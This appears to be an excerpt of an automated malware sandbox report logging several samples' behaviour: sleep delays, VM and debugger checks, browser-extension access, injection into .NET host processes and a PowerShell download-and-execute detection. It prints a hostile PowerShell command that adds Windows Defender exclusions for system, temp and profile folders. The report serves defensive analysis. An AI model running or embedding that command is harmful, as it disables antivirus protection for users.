Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593766	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592828	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592647	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592488	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592313	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591904	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591795	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591685	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591578	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591468	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591360	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591242	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591140	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591030	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590917	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590813	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590647	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590391	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590265	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590153	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590043	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589936	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589821	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589719	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589610	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589485	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589360	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589236	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589100	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588978	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588856	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588750	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599663	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599036	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598528	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598417	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597581	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597457	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597216	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596982	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596473	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595809	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595320	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595200	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595085	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594464	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594348	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594161	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594046	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593933	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593823	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593716	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593490	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592669	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592546	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592410	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592286	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592171	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592062	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591924	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591796	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591653	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591514	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591375	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591230	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591105	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590989	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590874	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590765	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590566	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589610	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589360	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589094	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588863	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588641	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588453	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588157	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 587994	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 587625	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586532	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586032	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\sysvplervcs.exe	Thread delayed: delay time: 40000
Source: C:\Users\user\sysvplervcs.exe	Thread delayed: delay time: 158340
Source: C:\Users\user\sysvplervcs.exe	Thread delayed: delay time: 111005
Source: C:\Users\user\sysvplervcs.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000013.00000002.1890904213.000000000120A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareJ`
Source: sysvplervcs.exe, 0000001A.00000002.4201672764.0000000000458000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: MSBuild.exe, 00000008.00000002.3090602331.0000000001568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: bomb.exe, 00000000.00000002.2630257085.000001342DA54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: http185.215.113.66pei.exe.exe, 00000003.00000002.1964855344.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, http185.215.113.66pei.exe.exe, 00000003.00000002.1964855344.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.3090602331.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3551387517.000001BE7AE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3552329072.000001BE7C259000.00000004.00000020.00020000.00000000.sdmp, sysvplervcs.exe, 0000001A.00000002.4201672764.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, sysvplervcs.exe, 0000001A.00000003.2112922624.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, sysvplervcs.exe, 0000001A.00000002.4201672764.0000000000461000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000028.00000002.4204016726.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000028.00000002.4204016726.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000013.00000002.1890904213.000000000120A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: MSBuild.exe, 00000008.00000002.3090602331.0000000001568000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareO
Source: http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe, 00000006.00000002.4396889819.00000000071A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	API call chain: ExitProcess graph end node	graph_4-4452
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	API call chain: ExitProcess graph end node	graph_4-4464
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_8-77840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_8-77824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node	graph_8-79167

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe

Code function: 5_2_00EF7996 GetCPInfo,LdrInitializeThunk,

5_2_00EF7996

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe

Code function: 3_2_00841B68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

3_2_00841B68

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

8_2_00418A63

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE20AD mov edi, dword ptr fs:[00000030h]	5_2_00EE20AD
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EF8038 mov eax, dword ptr fs:[00000030h]	5_2_00EF8038
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F09382 mov eax, dword ptr fs:[00000030h]	5_2_00F09382
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F0938D mov eax, dword ptr fs:[00000030h]	5_2_00F0938D
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F0936A mov eax, dword ptr fs:[00000030h]	5_2_00F0936A
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00F2058A mov eax, dword ptr fs:[00000030h]	5_2_00F2058A
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EEEFEC mov ecx, dword ptr fs:[00000030h]	5_2_00EEEFEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004014AD mov eax, dword ptr fs:[00000030h]	8_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040148A mov eax, dword ptr fs:[00000030h]	8_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004014A2 mov eax, dword ptr fs:[00000030h]	8_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004186A9 mov eax, dword ptr fs:[00000030h]	8_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_004186AA mov eax, dword ptr fs:[00000030h]	8_2_004186AA

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_0040A890 GetProcessHeaps,

4_2_0040A890

Source: C:\Users\user\Desktop\bomb.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\http185.215.113.66pei.exe.exe	Code function: 3_2_00841B68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_00841B68
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE75D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00EE75D0
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EEB736 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00EEB736
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE78F8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00EE78F8
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EE7A85 SetUnhandledExceptionFilter,	5_2_00EE7A85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0042774E SetUnhandledExceptionFilter,	8_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_67CBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_67CBAC62

Source: C:\Users\user\Desktop\bomb.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: bomb.exe PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR
Source: Yara match	File source: \Device\ConDrv, type: DROPPED

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Users\user\sysvplervcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
